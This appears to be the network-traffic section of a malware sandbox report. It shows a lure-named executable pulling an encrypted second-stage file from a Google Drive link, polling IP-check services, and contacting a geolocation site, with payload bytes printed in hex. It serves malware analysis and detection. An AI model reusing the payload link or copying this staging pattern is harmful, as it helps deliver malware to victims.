                                                                              Jul 24, 2024 14:45:33.970061064 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:45:33.970844984 CEST49789443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.970968008 CEST44349789172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:33.971163034 CEST49789443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.971380949 CEST49789443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:33.971446991 CEST44349789172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:34.014883995 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:45:34.201443911 CEST44349789172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:34.202763081 CEST49789443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:34.202785969 CEST44349789172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:34.474658966 CEST44349789172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:34.475120068 CEST44349789172.67.177.134192.168.11.20
                                                                              Jul 24, 2024 14:45:34.475414038 CEST49789443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:45:34.475544930 CEST49789443192.168.11.20172.67.177.134
                                                                              Jul 24, 2024 14:46:38.969155073 CEST8049781158.101.44.242192.168.11.20
                                                                              Jul 24, 2024 14:46:38.969547033 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:47:13.977932930 CEST4978180192.168.11.20158.101.44.242
                                                                              Jul 24, 2024 14:47:14.141292095 CEST8049781158.101.44.242192.168.11.20

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jul 24, 2024 14:45:23.342375994 CEST5408853192.168.11.201.1.1.1
                                                                              Jul 24, 2024 14:45:23.452994108 CEST53540881.1.1.1192.168.11.20
                                                                              Jul 24, 2024 14:45:24.015728951 CEST5995153192.168.11.201.1.1.1
                                                                              Jul 24, 2024 14:45:24.126194000 CEST53599511.1.1.1192.168.11.20
                                                                              Jul 24, 2024 14:45:27.264785051 CEST6203453192.168.11.201.1.1.1
                                                                              Jul 24, 2024 14:45:27.376019955 CEST53620341.1.1.1192.168.11.20
                                                                              Jul 24, 2024 14:45:28.423943996 CEST5659553192.168.11.201.1.1.1
                                                                              Jul 24, 2024 14:45:28.537071943 CEST53565951.1.1.1192.168.11.20

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jul 24, 2024 14:45:23.342375994 CEST192.168.11.201.1.1.10x9de4Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:24.015728951 CEST192.168.11.201.1.1.10x769cStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:27.264785051 CEST192.168.11.201.1.1.10xe37fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:28.423943996 CEST192.168.11.201.1.1.10xd26bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jul 24, 2024 14:45:23.452994108 CEST1.1.1.1192.168.11.200x9de4No error (0)drive.google.com142.251.167.113A (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:23.452994108 CEST1.1.1.1192.168.11.200x9de4No error (0)drive.google.com142.251.167.101A (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:23.452994108 CEST1.1.1.1192.168.11.200x9de4No error (0)drive.google.com142.251.167.102A (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:23.452994108 CEST1.1.1.1192.168.11.200x9de4No error (0)drive.google.com142.251.167.138A (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:23.452994108 CEST1.1.1.1192.168.11.200x9de4No error (0)drive.google.com142.251.167.139A (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:23.452994108 CEST1.1.1.1192.168.11.200x9de4No error (0)drive.google.com142.251.167.100A (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:24.126194000 CEST1.1.1.1192.168.11.200x769cNo error (0)drive.usercontent.google.com142.251.111.132A (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:27.376019955 CEST1.1.1.1192.168.11.200xe37fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:27.376019955 CEST1.1.1.1192.168.11.200xe37fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:27.376019955 CEST1.1.1.1192.168.11.200xe37fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:27.376019955 CEST1.1.1.1192.168.11.200xe37fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:27.376019955 CEST1.1.1.1192.168.11.200xe37fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:27.376019955 CEST1.1.1.1192.168.11.200xe37fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:28.537071943 CEST1.1.1.1192.168.11.200xd26bNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                              Jul 24, 2024 14:45:28.537071943 CEST1.1.1.1192.168.11.200xd26bNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • drive.google.com
                                                                              • drive.usercontent.google.com
                                                                              • reallyfreegeoip.org
                                                                              • checkip.dyndns.org

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.11.2049781158.101.44.242805668C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 24, 2024 14:45:27.543334007 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Jul 24, 2024 14:45:27.810448885 CEST322INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:27 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 5eaf97d2b706d14ea2e9d9f927cf1b99
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
                                                                              Jul 24, 2024 14:45:27.814985991 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Jul 24, 2024 14:45:27.983994961 CEST322INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:27 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 517c56619fd97e96cff2f3d182ce7325
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
                                                                              Jul 24, 2024 14:45:29.384762049 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Jul 24, 2024 14:45:29.548726082 CEST322INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: c7a70b022987a04ba89d234d54fffead
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
                                                                              Jul 24, 2024 14:45:30.377794981 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Jul 24, 2024 14:45:30.541811943 CEST322INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:30 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 80a6ad060b2f17f4282b1906a507e987
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
                                                                              Jul 24, 2024 14:45:31.056204081 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Jul 24, 2024 14:45:31.219908953 CEST322INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 9d50342dc51e3fc0712c6352284c5132
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
                                                                              Jul 24, 2024 14:45:31.747342110 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Jul 24, 2024 14:45:31.945415020 CEST322INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 118a8c9d39e699494e5d1932f39252dc
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
                                                                              Jul 24, 2024 14:45:32.452363968 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Jul 24, 2024 14:45:32.617572069 CEST322INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:32 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 164291d257b80453266feba32ac3181e
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
                                                                              Jul 24, 2024 14:45:33.123032093 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Jul 24, 2024 14:45:33.288347006 CEST322INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:33 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 8864eba5e92e6bd5b776d863041b9346
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
                                                                              Jul 24, 2024 14:45:33.806164026 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Jul 24, 2024 14:45:33.970061064 CEST322INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:33 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 2b538810d5a8f422b95769194d70c9a1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.11.2049779142.251.167.1134435668C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-24 12:45:23 UTC216OUTGET /uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Host: drive.google.com
                                                                              Cache-Control: no-cache
                                                                              2024-07-24 12:45:23 UTC1610INHTTP/1.1 303 See Other
                                                                              Content-Type: application/binary
                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                              Pragma: no-cache
                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                              Date: Wed, 24 Jul 2024 12:45:23 GMT
                                                                              Location: https://drive.usercontent.google.com/download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                              Content-Security-Policy: script-src 'nonce-lfnz482hWwVc7Vja9_G3kQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                              Server: ESF
                                                                              Content-Length: 0
                                                                              X-XSS-Protection: 0
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              X-Content-Type-Options: nosniff
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.11.2049780142.251.111.1324435668C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-24 12:45:24 UTC258OUTGET /download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Cache-Control: no-cache
                                                                              Host: drive.usercontent.google.com
                                                                              Connection: Keep-Alive
                                                                              2024-07-24 12:45:26 UTC4863INHTTP/1.1 200 OK
                                                                              Content-Type: application/octet-stream
                                                                              Content-Security-Policy: sandbox
                                                                              Content-Security-Policy: default-src 'none'
                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                              X-Content-Security-Policy: sandbox
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                              Cross-Origin-Resource-Policy: same-site
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Disposition: attachment; filename="LfCKiMaukAnpNnWD225.bin"
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Credentials: false
                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 133696
                                                                              Last-Modified: Tue, 16 Jul 2024 08:16:11 GMT
                                                                              X-GUploader-UploadID: AHxI1nNLJQ9oW_ul51xwr9LvJbaFgviq37SYDeNTUwDuwTo4vQw0S1-1HC6aIXcAUvSwAGdZKCETSP3fKg
                                                                              Date: Wed, 24 Jul 2024 12:45:26 GMT
                                                                              Expires: Wed, 24 Jul 2024 12:45:26 GMT
                                                                              Cache-Control: private, max-age=0
                                                                              X-Goog-Hash: crc32c=O61pkQ==
                                                                              Server: UploadServer
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close
                                                                              2024-07-24 12:45:26 UTC4863INData Raw: ca 3a 68 51 3a 4b 4a c0 68 06 55 94 b4 84 4d 8d 04 d1 de dc d9 01 f3 09 cb 68 e9 72 b4 e9 c2 4b b5 27 34 56 f9 ef c2 5a 3a de b8 25 7c 4d d4 81 9c 0f d2 eb 1a af 67 b0 57 b0 7c 79 91 b3 4b 7a 89 1c 08 7f b3 0c 82 2a 02 41 b0 24 4f 25 84 ae cc 67 49 5c 4c f5 ea 6d e3 9f bb 9e 22 c6 a1 d2 66 67 44 a2 0d e9 6e d9 96 d7 67 7c 06 82 72 5f 3e 54 21 34 47 a1 23 e0 c0 b3 ee 1c 8b d5 c8 b3 16 9f 9c 5c 83 8e 20 d6 4a 6d 35 bf 93 dc 9b d2 24 c5 99 70 af 07 7a ce 06 ae f6 dd d1 9a 4d 22 62 01 eb c5 3d b3 68 68 a2 2e 64 33 22 0f 44 b0 59 59 85 f5 38 fe 2b 32 0b 61 90 98 08 bc 79 d8 e8 71 9c 3f 85 85 65 57 15 3d 80 3c f3 46 8b e7 ab ca 1c a6 6a d9 14 1c f1 2c 15 64 eb 33 02 15 ac f0 fa ea 32 65 ea 2b a2 d0 fb ac 68 5c e0 93 20 e8 11 13 de 18 eb d6 8e f1 d7 a7 60 71 2d
                                                                              Data Ascii: :hQ:KJhUMhrK'4VZ:%|MgW|yKz*A$O%gI\Lm"fgDng|r_>T!4G#\ Jm5$pzM"b=hh.d3"DYY8+2ayq?eW=<Fj,d32e+h\ `q-
                                                                              2024-07-24 12:45:26 UTC4863INData Raw: 8d 00 80 f3 4a f1 3a 69 01 f4 aa 06 e2 cc c6 a9 cc a8 43 f8 ac b8 86 b9 1c 94 fc de aa b9 7f d3 dd bf cb 9f 4d 2d 82 ed 8d 2d ea 32 a8 23 0c 15 ed 77 ce 90 62 d6 cb 8b c5 91 aa 32 0a c1 92 de fb e6 c3 49 d3 b9 4b 49 42 40 7b 8c f5 15 70 cd 80 74 82 ca aa c8 e8 84 33 fa 9a 18 51 45 37 ed 5c 9b e3 a6 73 12 05 8b 68 d4 e0 59 08 b6 82 68 44 b6 9c 10 f0 bc d6 a5 a4 d8 30 f4 66 bc 04 47 c3 c8 73 78 be f7 3e 41 56 a7 04 95 c0 58 ba 76 f1 79 63 7b 70 24 98 cf 47 f1 ff 92 70 bf 31 2f f5 fb d1 d2 78 73 e6 9a e8 03 20 d0 37 de e6 f0 aa e6 b2 2b e2 50 ef 1c 65 4c f1 85 22 63 bb 8a f4 42 ed 04 0f e8 3d cc ad e1 da 10 87 f7 85 c4 3a f4 3f 67 ca 7f e2 44 8c 8a 84 1e cc ab 5c 41 e5 15 df ed 5c f3 e9 5c 4c 38 c3 27 df f3 31 64 c2 34 0a e6 bc f7 98 6f d5 43 1f c0 3e 8e bf
                                                                              Data Ascii: J:iCM--2#wb2IKIB@{pt3QE7\shYhD0fGsx>AVXvyc{p$Gp1/xs 7+PeL"cB=:?gD\A\\L8'1d4oC>
                                                                              2024-07-24 12:45:26 UTC112INData Raw: e4 45 d2 a4 8a 38 cc 99 df b3 fa b3 9d 27 ac 8c 7e e7 45 72 f7 be c9 6f a2 be ae 5a af 2e 0b bd ec 5f c2 ba 0f c0 6d ba 5d aa 9a 88 12 32 00 0d c3 81 68 a1 4e 28 6d 70 78 03 58 58 c1 48 f8 fe 7e 1c 67 12 05 d0 1a db d5 57 e9 4c 30 52 c9 3a e0 22 85 e3 b4 e0 ce 8b 22 99 d9 09 63 aa 98 ae 1b 49 e1 bc 95 9e c2 1a 57 ad 00 33 a9 a7 88 bd
                                                                              Data Ascii: E8'~EroZ._m]2hN(mpxXXH~gWL0R:""cIW3
                                                                              2024-07-24 12:45:26 UTC1255INData Raw: 50 6e e9 5d 5c d3 6a 40 33 4d 75 7c 31 25 c7 a3 9a be 0e e2 7f 07 fc 2f 57 9f 17 ae a7 65 05 66 69 f1 5d 3e b3 d4 f7 a7 a2 2c f4 df ff a5 12 a1 66 61 1e 0c 34 ec f0 ff ca fd ed 87 bc 26 57 e1 1e 65 55 33 92 72 8b 8c 84 84 3f df a8 fb 71 17 e8 55 5e be bf de 61 83 e3 94 cd 36 e1 28 45 b0 06 a4 bc da 7c 23 2f e7 a9 e6 e3 64 3a 98 43 48 f3 63 ab 6a 51 f0 ce c3 72 48 b6 53 90 8b b8 39 b2 83 93 d9 a0 1e 23 d6 12 13 63 0a ae 65 4f 4a 8f b2 6b 96 37 a6 72 43 9b 88 bb 1c cc d1 8f d4 d8 9c 4a 0d c5 c8 7b 4c 59 c3 09 1a e1 a6 3c ee 68 17 ea f2 3b a1 e1 2a 2b fc cd 6c 9c 84 af e0 15 86 40 fa a7 a9 8b 64 71 a4 51 cb e9 e5 ec 29 8b 2c ad b2 81 6c 07 20 df 28 03 6e 1d f0 f9 6b 5d d2 df fe ba 4d 4b 8e 65 cb 5b d0 9c 24 99 23 8c 7b 46 44 97 fc a6 1c af b3 37 94 a1 00 ba
                                                                              Data Ascii: Pn]\j@3Mu|1%/Wefi]>,fa4&WeU3r?qU^a6(E|#/d:CHcjQrHS9#ceOJk7rCJ{LY<h;*+l@dqQ),l (nk]MKe[$#{FD7
                                                                              2024-07-24 12:45:26 UTC65INData Raw: 9a b0 f4 27 3f ab 36 89 d0 0b e9 4b 06 82 4d 1c ed 67 53 1d 81 3e 1a ed 81 1f e4 49 f0 2f 61 9a 98 08 97 72 d8 a9 3d 8a 50 01 84 66 5d 45 bf 01 53 8d 6c 8b e7 af e2 d5 a6 8a d3 79 d7 fa 2d 4f 64
                                                                              Data Ascii: '?6KMgS>I/ar=Pf]ESly-Od
